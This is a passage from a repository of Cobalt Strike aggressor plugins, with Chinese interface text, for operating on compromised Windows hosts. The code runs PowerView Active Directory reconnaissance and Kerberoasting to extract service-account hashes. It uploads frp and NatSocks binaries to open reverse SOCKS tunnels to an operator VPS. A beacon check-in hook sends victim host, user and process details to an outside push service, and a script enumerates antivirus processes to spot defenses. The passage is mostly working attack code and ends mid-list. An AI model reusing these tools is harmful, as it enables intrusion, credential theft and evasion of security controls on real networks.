blog2($1, "Get-DomainSID 返回指定域的SID"); 169 | blog2($1, "Invoke-UserHunter 获取域用户登录的计算机信息及该用户是否有本地管理员权限"); 170 | blog2($1, "Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户"); 171 | blog2($1, "Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器"); 172 | blog2($1, "Invoke-ShareFinder 在本地域中的主机上查找(非标准)共享"); 173 | blog2($1, "Invoke-FileFinder 在本地域中的主机上查找潜在的敏感文件"); 174 | blog2($1, "Find-LocalAdminAccess 在域上查找当前用户具有本地管理员访问权限的计算机"); 175 | blog2($1, "Find-ManagedSecurityGroups 搜索受管理的活动目录安全组并标识对其具有写访问权限的用户,即这些组拥有添加或删除成员的能力"); 176 | blog2($1, "Get-ExploitableSystem 发现系统可能易受常见攻击"); 177 | blog2($1, "Invoke-EnumerateLocalAdmin 枚举域中所有计算机上本地管理员组的成员"); 178 | } 179 | 180 | 181 | alias powerview-import{ 182 | $bid = $1; 183 | if($2 eq 1){ 184 | $id = 1; 185 | fileexists($id, $bid); 186 | }else if($2 eq 0){ 187 | $id = 0; 188 | fileexists($id, $bid); 189 | }else{ 190 | blog2($1, "powerview-import 1 导入master分支的powerview.ps1"); 191 | blog2($1, "powerview-import 0 导入dev分支的powerview.ps1"); 192 | blog2($1, "导入powerview脚本 (导入分支的时候记得先清空原先导入的)"); 193 | } 194 | } 195 | 196 | 197 | sub fileexists{ 198 | if ($id eq 1){ 199 | $file = "PowerView_master.ps1"; 200 | }else{ 201 | $file = "PowerViewv3.0.ps1"; 202 | } 203 | 204 | if( -exists script_resource($file)){ 205 | btask($bid, "[*] found file:".$file); 206 | bpowershell_import($bid, script_resource($file)); 207 | btask($bid, "[!] load module:".$f." Sucess"); 208 | btask($bid, "[*] Test whether the import is successful,get domain SID"); 209 | bpowerpick($bid, "Get-DomainSID"); 210 | } 211 | } 212 | 213 | sub main{ 214 | if ($3['set'] eq '约束委派'){ 215 | if($3['type'] eq 'computer'){ 216 | $command = 'Get-DomainComputer -TrustedToAuth -Domain '.$3['domain']; 217 | }else{ 218 | $command = 'Get-DomainUser -TrustedToAuth -Domain '.$3['domain']; 219 | } 220 | bpowershell_import_clear($bid); 221 | $id = 1; 222 | fileexists($id, $bid); 223 | bpowerpick($bid, $command); 224 | }else{ 225 | bpowershell_import_clear($bid); 226 | $id = 0; 227 | fileexists($id, $bid); 228 | if($3['type'] eq 'computer'){ 229 | $command = 'Get-NetUser -Unconstrained -Domain '.$3['domain']; 230 | }else{ 231 | $command = 'Get-NetComputer -Unconstrained -Domain '.$3['domain']; 232 | } 233 | bpowerpick($bid, $command); 234 | } 235 | } 236 | 237 | sub main2{ 238 | bpowershell_import_clear($bid); 239 | $id = 1; 240 | fileexists($id, $bid); 241 | bpowerpick($bid, $command); 242 | $command = "Get-DomainGPO -Domain ".$3['domain']." -Properties Name, DisplayName"; 243 | bpowerpick($bid, $command); 244 | 245 | } 246 | 247 | sub ui{ 248 | $dialog = dialog("info", %(domain => "YAYI.local", bid => $bid), &main); 249 | dialog_description($dialog, "约束委派/非约束委派查询(非约束委派查询时,由于要导入另外分支的powerview将清空导入的ps1脚本)"); 250 | drow_combobox($dialog, "set", "委派类型:", @("约束委派", "非约束委派")); 251 | drow_combobox($dialog, "type", "查询类型:", @("computer", "user")); 252 | drow_text($dialog, "domain", "domain:"); 253 | dbutton_action($dialog, "RUN"); 254 | dialog_show($dialog); 255 | } 256 | 257 | sub ui2{ 258 | $dialog = dialog("info",%(domain => "YAYI.local",bid => $bid), &main2); 259 | dialog_description($dialog, "查询域内GPO名称和GPU objectid"); 260 | drow_text($dialog, "domain", "domain:"); 261 | dbutton_action($dialog, "RUN"); 262 | dialog_show($dialog); 263 | } 264 | 265 | 266 | popup beacon_bottom{ 267 | menu "PowerView"{ 268 | $bid = $1; 269 | item "约束委派用户查询"{ 270 | ui($bid); 271 | } 272 | 273 | item "GPO查询"{ 274 | ui2($bid); 275 | } 276 | 277 | } 278 | } 279 | -------------------------------------------------------------------------------- /powerview常用/2008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview常用/2008.png -------------------------------------------------------------------------------- /powerview常用/2008_query.cna: -------------------------------------------------------------------------------- 1 | sub moduleimport{ 2 | foreach $bid ($1){ 3 | blog($bid, "导入脚本: $modulename"); 4 | bpowershell_import($bid, script_resource($modulename)); 5 | } 6 | } 7 | 8 | sub getuser{ 9 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Identity \"$3['username']\""); 10 | } 11 | 12 | sub groupquery{ 13 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADGroupMember \'$3['groupname']\' | Select-Object name,objectClass,distinguishedName,SID | fl"); 14 | } 15 | 16 | sub spnuserquery{ 17 | bpowershell($bid, "Import-Module .\\AD.dll;Invoke-Kerberoast -Identity \'$3['spnusername']\' | %{\$_.hash}"); 18 | } 19 | 20 | popup beacon_bottom{ 21 | menu "powerview常用查询"{ 22 | item "上传AD模块"{ 23 | bupload($bid, script_resource("AD.dll")); 24 | } 25 | item "导入Powerview"{ 26 | $modulename = "Powerview.ps1"; 27 | moduleimport($1, $modulename); 28 | foreach $bid ($1){ 29 | blog2($bid, "powerview导入测试"); 30 | bpowershell($bid, "Import-Module .\\AD.dll;Get-DomainController"); 31 | } 32 | } 33 | item "查看指定的用户信息"{ 34 | $modulename = "Powerview.ps1"; 35 | moduleimport($1, $modulename); 36 | foreach $bid ($1){ 37 | $dialog = dialog("查看指定用户", %(username => ""), &getuser); 38 | dialog_description($dialog, "powerview查看指定用户的信息"); 39 | drow_text($dialog, "username", "用户: "); 40 | dbutton_action($dialog, "QUERY"); 41 | dialog_show($dialog); 42 | } 43 | } 44 | 45 | item "所有用户最后一个错误的密码尝试"{ 46 | $modulename = "Powerview.ps1"; 47 | moduleimport($1, $modulename); 48 | foreach $bid ($1){ 49 | bpowershell($bid, " 50 | Import-Module .\\AD.dll;get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table -auto"); 51 | } 52 | } 53 | 54 | 55 | item "查询某个组的用户"{ 56 | $modulename = "Powerview.ps1"; 57 | moduleimport($1, $modulename); 58 | foreach $bid ($1){ 59 | $dialog = dialog("查看指定组的所有用户", %(groupname => ""), &groupquery); 60 | dialog_description($dialog, "powerview查看指定组的所有用户"); 61 | drow_text($dialog, "groupname", "组名: "); 62 | dbutton_action($dialog, "QUERY"); 63 | dialog_show($dialog); 64 | } 65 | 66 | } 67 | 68 | item "域控机器查询"{ 69 | $modulename = "Powerview.ps1"; 70 | moduleimport($1, $modulename); 71 | foreach $bid ($1){ 72 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADDomainController -filter * | Select-Object HostName,IPv4Address,OperatingSystem | fl"); 73 | } 74 | } 75 | 76 | item "获取域级别"{ 77 | $modulename = "Powerview.ps1"; 78 | moduleimport($1, $modulename); 79 | foreach $bid ($1){ 80 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADDomain | Select-Object DNSRoot,PDCEmulator,DomainMode"); 81 | } 82 | } 83 | 84 | item "寻找域内所有计算机和计算机对应的DNS"{ 85 | $modulename = "Powerview.ps1"; 86 | moduleimport($1, $modulename); 87 | foreach $bid ($1){ 88 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADComputer -Filter * -Property Name,IPv4Address | Select-Object DNSHostName,IPv4Address,SID | fl"); 89 | } 90 | } 91 | 92 | item "寻找域内所有用户"{ 93 | $modulename = "Powerview.ps1"; 94 | moduleimport($1, $modulename); 95 | foreach $bid ($1){ 96 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Filter * | Select-Object Name,ObjectClass,SID | fl"); 97 | } 98 | } 99 | 100 | item "寻找kerberos服务用户"{ 101 | $modulename = "Powerview.ps1"; 102 | moduleimport($1, $modulename); 103 | foreach $bid ($1){ 104 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -filter {ServicePrincipalName -like \"*\"} -Property * | Select-Object Name,SID,ServicePrincipalNames | fl"); 105 | } 106 | } 107 | 108 | item "无委派计算机查询"{ 109 | $modulename = "Powerview.ps1"; 110 | moduleimport($1, $modulename); 111 | foreach $bid ($1){ 112 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADComputer -Filter {TrustedForDelegation -eq \$True} -Properties * | select-object DNSHostName,IPv4Address,KerberosEncryptionType,whenCreated | fl"); 113 | } 114 | } 115 | 116 | item "约束委派用户查询"{ 117 | $modulename = "Powerview.ps1"; 118 | moduleimport($1, $modulename); 119 | foreach $bid ($1){ 120 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Filter {TrustedToAuthForDelegation -eq \$True} -Properties * | select-object DistinguishedName,servicePrincipalName,msDS-AllowedToDelegateTo"); 121 | } 122 | } 123 | 124 | item "域用户不要求kerberos验证身份查询"{ 125 | $modulename = "Powerview.ps1"; 126 | moduleimport($1, $modulename); 127 | foreach $bid ($1){ 128 | bpowershell($pid, "Import-Module .\\AD.dll;Get-ADUser -Filter {DoesNotRequirePreAuth -eq \$False} | Select-Object Name,SID | fl"); 129 | } 130 | } 131 | 132 | item "获取指定SPN用户的hash"{ 133 | $modulename = "Powerview.ps1"; 134 | moduleimport($1, $modulename); 135 | foreach $bid ($1){ 136 | $dialog = dialog("获取指定SPN用户的hash", %(spnusername => ""), &spnuserquery); 137 | dialog_description($dialog, "powerview获取指定SPN用户的hash"); 138 | drow_text($dialog, "spnusername", "用户: "); 139 | dbutton_action($dialog, "QUERY"); 140 | dialog_show($dialog); 141 | } 142 | } 143 | 144 | item "枚举有价值(高权限组)的SPN用户"{ 145 | $modulename = "Powerview.ps1"; 146 | moduleimport($1, $modulename); 147 | foreach $bid ($1){ 148 | bpowershell($bid, "Import-Module .\\AD.dll;Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon"); 149 | } 150 | 151 | } 152 | } 153 | } -------------------------------------------------------------------------------- /powerview常用/2012_query.cna: -------------------------------------------------------------------------------- 1 | sub moduleimport{ 2 | foreach $bid ($1){ 3 | blog($bid, "导入脚本: $modulename"); 4 | bpowershell_import($bid, script_resource($modulename)); 5 | } 6 | } 7 | 8 | sub getuser{ 9 | bpowershell($bid, "Get-ADUser -Identity \"$3['username']\""); 10 | } 11 | 12 | sub groupquery{ 13 | bpowershell($bid, "Get-ADGroupMember \'$3['groupname']\' | Select-Object name,objectClass,distinguishedName,SID | fl"); 14 | } 15 | 16 | sub spnuserquery{ 17 | bpowershell($bid, "Invoke-Kerberoast -Identity \'$3['spnusername']\' | %{\$_.hash}"); 18 | } 19 | 20 | popup beacon_bottom{ 21 | menu "powerview常用查询"{ 22 | item "导入Powerview"{ 23 | $modulename = "Powerview.ps1"; 24 | moduleimport($1, $modulename); 25 | foreach $bid ($1){ 26 | blog2($bid, "powerview导入测试"); 27 | bpowershell($bid, "Get-DomainController"); 28 | } 29 | } 30 | item "查看指定的用户信息"{ 31 | $modulename = "Powerview.ps1"; 32 | moduleimport($1, $modulename); 33 | foreach $bid ($1){ 34 | $dialog = dialog("查看指定用户", %(username => ""), &getuser); 35 | dialog_description($dialog, "powerview查看指定用户的信息"); 36 | drow_text($dialog, "username", "用户: "); 37 | dbutton_action($dialog, "QUERY"); 38 | dialog_show($dialog); 39 | } 40 | } 41 | 42 | item "所有用户最后一个错误的密码尝试"{ 43 | $modulename = "Powerview.ps1"; 44 | moduleimport($1, $modulename); 45 | foreach $bid ($1){ 46 | bpowershell($bid, " 47 | get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table -auto"); 48 | } 49 | } 50 | 51 | 52 | item "查询某个组的用户"{ 53 | $modulename = "Powerview.ps1"; 54 | moduleimport($1, $modulename); 55 | foreach $bid ($1){ 56 | $dialog = dialog("查看指定组的所有用户", %(groupname => ""), &groupquery); 57 | dialog_description($dialog, "powerview查看指定组的所有用户"); 58 | drow_text($dialog, "groupname", "组名: "); 59 | dbutton_action($dialog, "QUERY"); 60 | dialog_show($dialog); 61 | } 62 | 63 | } 64 | 65 | item "域控机器查询"{ 66 | $modulename = "Powerview.ps1"; 67 | moduleimport($1, $modulename); 68 | foreach $bid ($1){ 69 | bpowershell($bid, "Get-ADDomainController -filter * | Select-Object HostName,IPv4Address,OperatingSystem | fl"); 70 | } 71 | } 72 | 73 | item "获取域级别"{ 74 | $modulename = "Powerview.ps1"; 75 | moduleimport($1, $modulename); 76 | foreach $bid ($1){ 77 | bpowershell($bid, "Get-ADDomain | Select-Object DNSRoot,PDCEmulator,DomainMode"); 78 | } 79 | } 80 | 81 | item "寻找域内所有计算机和计算机对应的DNS"{ 82 | $modulename = "Powerview.ps1"; 83 | moduleimport($1, $modulename); 84 | foreach $bid ($1){ 85 | bpowershell($bid, "Get-ADComputer -Filter * -Property Name,IPv4Address | Select-Object DNSHostName,IPv4Address,SID | fl"); 86 | } 87 | } 88 | 89 | item "寻找域内所有用户"{ 90 | $modulename = "Powerview.ps1"; 91 | moduleimport($1, $modulename); 92 | foreach $bid ($1){ 93 | bpowershell($bid, "Get-ADUser -Filter * | Select-Object Name,ObjectClass,SID | fl"); 94 | } 95 | } 96 | 97 | item "寻找kerberos服务用户"{ 98 | $modulename = "Powerview.ps1"; 99 | moduleimport($1, $modulename); 100 | foreach $bid ($1){ 101 | bpowershell($bid, "Get-ADUser -filter {ServicePrincipalName -like \"*\"} -Property * | Select-Object Name,SID,ServicePrincipalNames | fl"); 102 | } 103 | } 104 | 105 | item "无委派计算机查询"{ 106 | $modulename = "Powerview.ps1"; 107 | moduleimport($1, $modulename); 108 | foreach $bid ($1){ 109 | bpowershell($bid, "Get-ADComputer -Filter {TrustedForDelegation -eq \$True} -Properties * | select-object DNSHostName,IPv4Address,KerberosEncryptionType,whenCreated | fl"); 110 | } 111 | } 112 | 113 | item "约束委派用户查询"{ 114 | $modulename = "Powerview.ps1"; 115 | moduleimport($1, $modulename); 116 | foreach $bid ($1){ 117 | bpowershell($bid, "Get-ADUser -Filter {TrustedToAuthForDelegation -eq \$True} -Properties * | select-object DistinguishedName,servicePrincipalName,msDS-AllowedToDelegateTo"); 118 | } 119 | } 120 | 121 | item "域用户不要求kerberos验证身份查询"{ 122 | $modulename = "Powerview.ps1"; 123 | moduleimport($1, $modulename); 124 | foreach $bid ($1){ 125 | bpowershell($pid, "Get-ADUser -Filter {DoesNotRequirePreAuth -eq \$False} | Select-Object Name,SID | fl"); 126 | } 127 | } 128 | 129 | item "获取指定SPN用户的hash"{ 130 | $modulename = "Powerview.ps1"; 131 | moduleimport($1, $modulename); 132 | foreach $bid ($1){ 133 | $dialog = dialog("获取指定SPN用户的hash", %(spnusername => ""), &spnuserquery); 134 | dialog_description($dialog, "powerview获取指定SPN用户的hash"); 135 | drow_text($dialog, "spnusername", "用户: "); 136 | dbutton_action($dialog, "QUERY"); 137 | dialog_show($dialog); 138 | } 139 | } 140 | } 141 | } -------------------------------------------------------------------------------- /powerview常用/AD.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview常用/AD.dll -------------------------------------------------------------------------------- /powerview常用/README.md: -------------------------------------------------------------------------------- 1 | ## powerview查询 ## 2 | ![](one.jpg) 3 | 4 | 2008无AD模块的需要先点击上传AD模块,然后在点击对应的功能 -> 2008_query.cna 5 | ![](2008.png) 6 | 7 | ## 更新记录 ## 8 | 2021/2/5 修复了2008等需要依赖`Microsoft.ActiveDirectory.Management.dll`通常导入powerview.ps1缺少的依赖 9 | 2021/2/5 新增功能`枚举在Domain Admins组等之类高权限组的用户` 10 | -------------------------------------------------------------------------------- /powerview常用/one.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview常用/one.jpg -------------------------------------------------------------------------------- /上线提醒/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/上线提醒/1.png -------------------------------------------------------------------------------- /上线提醒/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/上线提醒/2.png -------------------------------------------------------------------------------- /上线提醒/load.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial{ 2 | $host = beacon_info($1, "external"); 3 | $internal = beacon_info($1, "internal"); 4 | $listener = beacon_info($1, "listener"); 5 | $user = beacon_info($1, "user"); 6 | $computer = beacon_info($1, "computer"); 7 | $process = beacon_info($1, "process"); 8 | $pid = beacon_info($1, "pid"); 9 | $arch = beacon_info($1, "arch"); 10 | $command = "python " . script_resource("plus.py") . " $host $internal $listener $user $computer $process $pid $arch"; 11 | exec($command); 12 | #println("$content"); 13 | } -------------------------------------------------------------------------------- /上线提醒/plus.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import sys 4 | from functools import wraps 5 | 6 | token="" 7 | headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"} 8 | topic="utf8" 9 | 10 | def log(func): 11 | @wraps(func) 12 | def wrapper(*args,**kwargs): 13 | try: 14 | ret=func(*args,**kwargs) 15 | except Exception as error: 16 | ret="" 17 | print("[Error] filename:{} line:{} Error:{}".format(error.__traceback__.tb_frame.f_globals["__file__"],error.__traceback__.tb_lineno,error)) 18 | return ret 19 | return wrapper 20 | 21 | @log 22 | def send(title,content): 23 | url="http://www.pushplus.plus/send/{}".format(token) 24 | headers["Content-Type"]="application/json" 25 | data={"title":title,"content":content,"topic":topic} 26 | body=json.dumps(data) 27 | rqt=requests.post(url=url,headers=headers,data=body,timeout=3,verify=False) 28 | print(rqt.json()) 29 | 30 | if __name__ == '__main__': 31 | content=["teamserver","ip","listener","user","computer","process","pid","arch"] 32 | text="

" 33 | for c in range(1,len(sys.argv)): 34 | text+="{}:{}
".format(content[c-1],sys.argv[c]) 35 | text+="

" 36 | send("CS上线提醒",text) -------------------------------------------------------------------------------- /上线提醒/readme.md: -------------------------------------------------------------------------------- 1 | 1.登录 http://www.pushplus.plus/ 2 | 2.创建群组 (wx扫码加入群组) 3 | 3.修改plus.py里的token和topic (topic为你设置的群组编码) 4 | 4.cs加载该插件 or `nohup sudo ./agscript load.cna 2>&1 &` 5 | 参考链接:https://xz.aliyun.com/t/10698 6 | 7 | ![](1.png) 8 | ![](2.png) 9 | -------------------------------------------------------------------------------- /代理/NatSocks.x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/NatSocks.x64.exe -------------------------------------------------------------------------------- /代理/NatSocks.x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/NatSocks.x86.exe -------------------------------------------------------------------------------- /代理/README.md: -------------------------------------------------------------------------------- 1 | ## 代理插件 ## 2 | 功能: 3 | * 集合了frp的socks5 4 | * 集合了natsocks 5 | * 支持多beacon 6 | 7 | ![](img/frp.png) 8 | 9 | ![](img/frp2.png) 10 | 11 | ![](img/natsocks.png) 12 | 13 | ![](img/natsocks2.png) -------------------------------------------------------------------------------- /代理/default.cna: -------------------------------------------------------------------------------- 1 | sub frpsocks{ 2 | if("README" eq $2){ 3 | show_message("FrpSocks5帮助\ntips:如果你的VPS上已经监听好了FRP则直接填写对应的配置即可\nserver_addr:你的VPS地址\nserver_port:VPS上FPR对应的监听端口\ntoken:FRP的token验证\nsocks5_Listenport:VPS SOCKS5成功后监听的端口"); 4 | }else{ 5 | foreach $id ($bid){ 6 | btask($id, "server_addr:$3['addr'] server_port:$3['port'] token:$3['token'] socks5Listenport:$3['listenport']"); 7 | btask($id, "Create frps.ini and frpc.ini"); 8 | btask($id, "VPS(frps):nohup ./frps -c frps.ini &"); 9 | btask($id, "Client:frpc.exe -c frpc.ini"); 10 | } 11 | #生成frps.ini和frpc.ini 12 | $serverdata = "[common] 13 | bind_port = $3['port'] 14 | token = $3['token']"; 15 | 16 | $clientdata = "[common] 17 | server_addr = $3['addr'] 18 | server_port = $3['port'] 19 | token = $3['token'] 20 | 21 | [socks5] 22 | type = tcp 23 | remote_port = $3['listenport'] 24 | plugin = socks5 25 | use_encryption = true 26 | use_compression = true"; 27 | 28 | #配置文件保存路径 29 | $serverpath = script_resource("frps.ini"); 30 | $clientpath = script_resource("frpc.ini"); 31 | $f = openf(">$serverpath"); 32 | writeb($f, $serverdata); 33 | closef($f); 34 | 35 | $f = openf(">$clientpath"); 36 | writeb($f, $clientdata); 37 | closef($f); 38 | 39 | #上传frpc.exe和frpc.ini到目标 40 | foreach $id ($bid){ 41 | bupload($id, script_resource("frpc.exe")); 42 | bupload($id, script_resource("frpc.ini")); 43 | btask($id, "frpc.exe -c frpc.ini"); 44 | bshell($id, "frpc.exe -c frpc.ini"); 45 | } 46 | } 47 | } 48 | 49 | sub natsocks { 50 | if("README" eq $2){ 51 | show_message("NatSocks帮助\nmode:resocks为反弹socsk5\nslave为反弹指定端口\n端口映射\n将内网机器(127.0.0.1)的3389端口转发到公网机器(8.8.8.8)的2017端口:\n公网机器(8.8.8.8):NatSocks -listen 1997 2017\nSocks5\n内网机器(127.0.0.1):NatSocks -slave 127.0.0.1:3389 8.8.8.8:1997\n在内网机器(127.0.0.1)的1080端口建立socks服务并转发到公网机器(8.8.8.8)的2017端口:\n公网机器(8.8.8.8):NatSocks -listen 1997 2017\n内网机器(127.0.0.1):NatSocks -resocks 127.0.0.1:1080 8.8.8.8:1997") 52 | }else{ 53 | if($3['arch'] eq "x64"){ 54 | $name = "NatSocks.x64.exe"; 55 | $path = script_resource("NatSocks.x64.exe"); 56 | }else{ 57 | $name = "NatSocks.x86.exe"; 58 | $path = script_resource("NatSocks.x86.exe"); 59 | } 60 | $command = "$name -$3['mode'] $3['Intranet']\:$3['Intranetport'] $3['remoteaddr']\:$3['remoteport']"; 61 | foreach $id ($bid){ 62 | bupload($id, $path); 63 | btask($id, $command); 64 | bshell($id, $command); 65 | } 66 | 67 | } 68 | } 69 | 70 | sub frpwindow { 71 | $dialog = dialog("frp socks5 config", %(addr => "0.0.0.0", port => "7000", token => "RaidenMei", listenport => "8088", bid => $bid), &frpsocks); 72 | dialog_description($dialog, "frp socks5 配置文件生成上传"); 73 | drow_text($dialog, "addr", "server_addr: "); 74 | drow_text($dialog, "port", "server_port: "); 75 | drow_text($dialog, "token", "token: "); 76 | drow_text($dialog, "listenport", "socks5_Listenport: "); 77 | dbutton_action($dialog, "Create"); 78 | dbutton_action($dialog, "README"); 79 | dialog_show($dialog); 80 | } 81 | 82 | sub NatSockswindow { 83 | $dialog = dialog("NatSocks socks5 config", %(Intranet => "127.0.0.1", Intranetport => "1080", remoteaddr => "1.1.1.1", remoteport => "1997", arch => "x64", mode => "resocks"), &natsocks); 84 | dialog_description($dialog, "NatSocks Socks5反弹,Arch:x64/x86\nmode:resocks为反弹socsk5\nslave为反弹指定端口"); 85 | drow_text($dialog, "Intranet", "Intranet: "); 86 | drow_text($dialog, "Intranetport", "Intranetport: "); 87 | drow_text($dialog, "remoteaddr", "VPSAddr: "); 88 | drow_text($dialog, "remoteport", "VPSport: "); 89 | drow_text($dialog, "mode", "mode: "); 90 | drow_text ($dialog, "arch", "Arch: "); 91 | dbutton_action($dialog, "Go"); 92 | dbutton_action($dialog, "README"); 93 | dialog_show($dialog); 94 | } 95 | 96 | popup beacon_bottom{ 97 | $bid = $1; 98 | menu "代理"{ 99 | item "frp"{ 100 | frpwindow($bid); 101 | } 102 | 103 | item "NatSocks"{ 104 | NatSockswindow($bid); 105 | } 106 | } 107 | } 108 | -------------------------------------------------------------------------------- /代理/frpc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/frpc.exe -------------------------------------------------------------------------------- /代理/frpc.ini: -------------------------------------------------------------------------------- 1 | [common] 2 | server_addr = 0.0.0.0 3 | server_port = 7000 4 | token = RaidenMei 5 | 6 | [socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true -------------------------------------------------------------------------------- /代理/frps.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/frps.exe -------------------------------------------------------------------------------- /代理/frps.ini: -------------------------------------------------------------------------------- 1 | [common] 2 | bind_port = 7000 3 | token = RaidenMei -------------------------------------------------------------------------------- /代理/img/frp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/frp.png -------------------------------------------------------------------------------- /代理/img/frp2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/frp2.png -------------------------------------------------------------------------------- /代理/img/natsocks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/natsocks.png -------------------------------------------------------------------------------- /代理/img/natsocks2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/natsocks2.png -------------------------------------------------------------------------------- /取证/README.md: -------------------------------------------------------------------------------- 1 | windows取证 2 | + 最近使用痕迹查询 3 | 4 | ## 最近使用痕迹查询 ## 5 | ![](img/recentquery.png) 6 | -------------------------------------------------------------------------------- /取证/img/recentquery.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/取证/img/recentquery.png -------------------------------------------------------------------------------- /取证/openfilehistory.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/取证/openfilehistory.exe -------------------------------------------------------------------------------- /取证/qz.cna: -------------------------------------------------------------------------------- 1 | sub recentqueryfunc{ 2 | $path = script_resource("openfilehistory.exe"); 3 | bupload($3['bid'], $path); 4 | bshell($3['bid'], "openfilehistory.exe $3['username']"); 5 | } 6 | 7 | 8 | sub recentquery{ 9 | $dialog = dialog("最近使用痕迹查询", %(username => "Administrator", bid => $id), &recentqueryfunc); 10 | dialog_description($dialog, "要查询的用户名输入"); 11 | drow_text($dialog, "username", "USERNAME:"); 12 | dbutton_action($dialog, "run"); 13 | dialog_show($dialog); 14 | } 15 | 16 | popup beacon_bottom { 17 | menu "windows取证"{ 18 | $bid = $1; 19 | item "最近使用痕迹"{ 20 | foreach $id ($bid){ 21 | recentquery($id) 22 | } 23 | } 24 | } 25 | } -------------------------------------------------------------------------------- /杀毒检测/README.md: -------------------------------------------------------------------------------- 1 | ## 进程检测 ## 2 | pscheck 3 | 需要检测的进程写在list.txt,格式如下 4 | ``` 5 | => 6 | ``` 7 | 8 | pscheck列出匹配的进程 9 | ![](process_check.png) 10 | 11 | xiaobaicheck 12 | 由刨洞群的小白师傅在线进程检测提供,请求http://42.193.251.15/tasklist.php 获取返回结果 13 | ![](xiaobaicheck.png) 14 | -------------------------------------------------------------------------------- /杀毒检测/av_query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/杀毒检测/av_query.png -------------------------------------------------------------------------------- /杀毒检测/check.cnf: -------------------------------------------------------------------------------- 1 | popup beacon_bottom{ 2 | item "杀毒查询"{ 3 | foreach $id ($1){ 4 | bpowershell_import!($id, script_resource("check.ps1")); 5 | bpowerpick!($id, "avquery"); 6 | } 7 | } 8 | } 9 | 10 | alias avquery{ 11 | bpowershell_import!($1, script_resource("check.ps1")); 12 | bpowerpick!($1, "avquery"); 13 | } -------------------------------------------------------------------------------- /杀毒检测/check.ps1: -------------------------------------------------------------------------------- 1 | function avquery{ 2 | $avname=@("360tray","360safe","ZhuDongFangYu","360sd","a2guard","ad-watch","cleaner8","vba32lder","MongoosaGUI","CorantiControlCenter32","F-PROT","CMCTrayIcon","K7TSecurity","UnThreat","CKSoftShiedAntivirus4","AVWatchService","ArcaTasksService","iptray","PSafeSysTray","nspupsvc","SpywareTerminatorShield","BKavService","MsMpEng","SBAMSvc","ccSvcHst","f-secure","avp","KvMonXP","RavMonD","Mcshield","Tbmon","Frameworkservice","egui","ekrn","eguiProxy","kxetray","knsdtray","TMBMSRV","avcenter","avguard","avgnt","sched","ashDisp","rtvscan","ccapp","NPFMntor","ccSetMgr","ccRegVfy","vptray","ksafe","QQPCRTP","Miner","AYAgent","patray","V3Svc","avgwdsvc","QUHLPSVC","mssecess","SavProgress","SophosUI","SophosFS","SophosHealth","SophosSafestore64","SophosCleanM","fsavgui","vsserv","remupd","FortiTray","safedog","parmor","Iparmor","beikesan","KSWebShield","TrojanHunter","GG","adam","AST","ananwidget","AVK","avg","spidernt","avgaurd","vsmon","cpf","outpost","rfwmain","kpfwtray","FYFireWall","MPMon","pfw","S","1433","DUB","ServUDaemon","BaiduSdSvc","BaiduSdTray","BaiduSd","SafeDogGuardCenter","safedogupdatecenter","safedogguardcenter","SafeDogSiteIIS","SafeDogTray","SafeDogServerUI","D_Safe_Manage","d_manage","yunsuo_agent_service","yunsuo_agent_daemon","HwsPanel","hws_ui","hws","hwsd","hipstray","wsctrl","usysdiag","WEBSCANX","SPHINX","bddownloader","b